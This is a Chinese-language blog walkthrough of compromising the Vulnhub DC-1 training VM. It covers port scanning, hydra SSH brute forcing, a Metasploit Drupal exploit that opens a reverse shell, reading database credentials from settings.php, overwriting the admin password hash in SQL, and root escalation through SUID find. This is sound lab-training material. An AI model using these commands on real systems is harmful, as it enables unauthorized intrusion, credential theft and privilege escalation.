freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Vulnhub靶机 DC-1打靶 渗透详细过程
rumilc 2024-04-16 21:05:17 114869

Vulnhub靶机:DC-1渗透详细过程

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-1-1,292/

image-20240413193827250

二、攻击方式

主机发现

使用arp-scan命令,发现主机也可以使用nmap,均可

image-20240413194808979

端口扫描

nmap -p- 192.168.0.106

image-20240413194852624

开放了22端口以及80,http端口服务,接下来探针服务信息

nmap -sV -A 192.168.0.106

image-20240413195013846

image-20240413195030315

由于开放了22端口,我们可以尝试去爆破一下,但是未果。

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.106

image-20240413205138709

探针还发现开放了80端口,接下来可以进行访问web界面

web渗透

访问过后得到以下界面,此web服务使用了Drupal CMS魔板

image-20240413195432965

信息收集

image-20240413195502432

我们回到kali端,开启msf,进行搜索相关的漏洞看有无可利用的,如下:

利用msf反弹shell

search drupal

image-20240413195650261

use 1 //尝试使用第一个API这个
set rhosts 192.168.0.106 //靶机ip
set lhosts 0.0.0.0
set lport 4444
exploit

image-20240413200009353

成功接收到shell,并为普通www-data权限:

image-20240413200124233

当前目录下有flag1.txt,查看一下提示:

image-20240413200203660

翻译:每一个好的CMS都需要一个配置文件--你也一样。

数据库信息

根据提示找到他的配置文件,不清楚得网上搜一下,Drupal CMS配置文件在哪即可

image-20240413200603944

进入到shell当中,当前所在路径为/var/www,直接进入到配置文件当中即可

cd /var/www/sites/default/
cat settings.php

image-20240413200737786

查看配置文件信息settings.php,得到数据库的用户名和密码,连接即可查看数据库内容

image-20240413200951917

mysql -u dbuser -p
密码:R0ck3t
或
mysql -u dbuser -pR0ck3t

首先获取一个稳定shell,交互性shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20240413201208933

进入数据库当中,查看所有数据库

image-20240413201235559

web管理员密码

查看当前的数据库和users数据表,查看users表当中的数据信息,得到管理员用户名和密码,但是密码被加密,此加密是自带的加密方式,需要找到加密脚本,搜索一下

image-20240413201405046

先把数据拿出来,放到记事本当中。

搜索发现,加密脚本在scripts当中的passwd-hash.sh

进入到此路径当中,查看一下脚本信息:

发现此脚本为php脚本,由此用php来执行,我们来获取一下自定义新密码,从而更新数据库,修改admin管理员的密码

image-20240413202054562

image-20240413202143959

php password-hash.sh admin //生成新密码

image-20240413202242606

回到数据库,将admin密码更新成我们生成的这个自定义密码hash值即可。

UPDATE drupaldb.users SET password = '自定义生成的密码hash值' WHERE username = 'admin' or username = 'Fred';

image-20240413202825961

登录web界面,进入后台即可。

提权

找到flag3.txt,翻译如下

特殊的PERMS将帮助查找(find)密码-但您需要-exec命令来确定如何获得阴影中的内容。

image-20240413203019671

发现有find命令提示,查看一下find命令得权限

ls -l $(which find)

发现为root权限,那么利用find提权即可,当然提示当中也有说明,使用-exec参数

image-20240413203424232

find /etc/passwd -exec whomai \;

image-20240413203825321

获取一个shell,命令如下:

find /etc/passwd -exec "/bin/sh" \;

image-20240413203839001

方法二,我们通过msf拿到shell以后,可以直接走提权三部曲

查找系统当中拥有suid权限的命令,有没有可利用的

find / -perm -u=s -type f 2>/dev/null
或
find / -user root -perm -4000 print 2>/dev/null

直接发现了find命令,可直接利用,命令同方法一

image-20240413204904220

文章不妥之处,欢迎批评指正!

# 漏洞 # 渗透测试 # web安全 # 漏洞分析 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 rumilc 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
VulnHub靶机 | 红队打靶
权限提升
WEB安全
rumilc LV.5
喜欢网络安全,热爱探索前沿技术! 答案交给时间寻觅,未来不负时光所期! CSDN:https://blog.csdn.net/rumil
  • 27 文章数
  • 38 关注者
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
2024-06-02
内网安全-隧道搭建&穿透上线&内网渗透-Linux上线-cs上线Linux主机
2024-05-28
VulnHub靶机 DC-9打靶 渗透详细流程
2024-04-27
文章目录